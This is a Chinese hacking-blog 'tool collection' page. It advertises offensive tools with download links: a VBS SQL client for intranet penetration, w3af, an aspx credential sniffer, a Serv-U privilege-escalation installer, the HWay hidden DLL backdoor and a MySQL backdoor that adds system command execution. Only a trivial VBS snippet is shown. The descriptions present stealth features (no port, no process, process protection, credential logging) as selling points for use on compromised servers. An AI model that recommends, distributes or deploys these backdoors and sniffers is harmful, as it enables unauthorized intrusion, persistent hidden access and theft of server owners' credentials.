分类 ‘工具收集’ 下的日志

vbs版的sql查询分析器

作者:lcx

‘花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了,和它的功能是一模一样的,不过用起来可能没有asp版的舒服,不过能用,可以用在dos下了,渗透内网时估计你用得着。

if (lcase(right(wscript.fullname,11))=”wscript.exe”) then
echo “Execute it under the cmd.exe Plz! Thx.”
echo “code by lcx”
wscript.quit
end If
阅读全文 »

Tags:

openfetion代码

来源:zwell

前一段时间刚好分析过飞信2006的协议,这个是2008的PHP实现,保留备忘。主页:http://openfetion.sourceforge.net/

Tags:

w3af

Tr4c3推荐

w3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is currently hosted at SourceForge . For further information, you may also want to visit w3af SourceForge project page .

If you are here just to “take a look” these screenshots and videos will show you what w3af can do:

  • OS commanding detection and exploit (console user interface) – Screenshot
  • OS commanding and DAV misconfiguration detection and exploit (console user interface) – Screenshot
  • Blind SQL Injection exploit (console user interface) – Screenshot
  • OS commanding detection and exploit (pyGTK user interface) – Video

阅读全文 »

Tags:

不用WinRar将网络空间上的文件打包下载(adodb.stream)

原文

此方法,不建议压缩,大文件,

一般的小文件压几个还很好用的
阅读全文 »

WebSniff 1.0

作者: cnqing
来源: cncert.net

程序说明
user权限的aspx rawsocket sniff,可用于smtp,http,ftp敏感信息获取。

功能特点
可过滤端口,关键字,包大小;
结果以Tcpdump/wireshark格式保存,生成的rar文件 直接用wireshark打开;

下载地址http://www.cncert.net/up_files/soft/websniff1.0.rar

Tags: ,

HWay && Serv-U.php

作者:linx2008

利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能.

如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击”获取Serv-U的管理员密码和端口”尝试获取更改后Serv-U的管理员密码和端口.

详细用法看压缩包内图文说明。
http://blogimg.chinaunix.net/blog/upfile2/080712123643.rar

Tags:

HWay V3.0

作者:linx2008

HwaV3.0优点如下:

1.DLL后门,利用svchost.exe启动,隐蔽进程
2.利用sniff的方式接受命令,实现了无端口的后门,但也可以指定Hway监听133端口接受正向连接。
3.同时支持正向和反向两种连接方式
4.支持文件上传,下载,屏幕截图,进程查杀等功能
5.使用了进程保护.但只在DLL被退出时才把dll注入到explorer.Exe进行进程保护,降低了系统消耗.
6.具有嗅探器的功能,把嗅探到的FTP帐号和来自HTTP POST的敏感信息记录到” system32\snifflogV3.log”下 (这里有个bug:嗅探一段时间后,snifflogV3.log可能会变得很大)
阅读全文 »

Tags:

Mysql BackDoor

作者:linx2008

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的”state”函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击”自动安装Mysql BackDoor”

安装成功后,Mysql上便会增加一个”state”函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
阅读全文 »

Tags: ,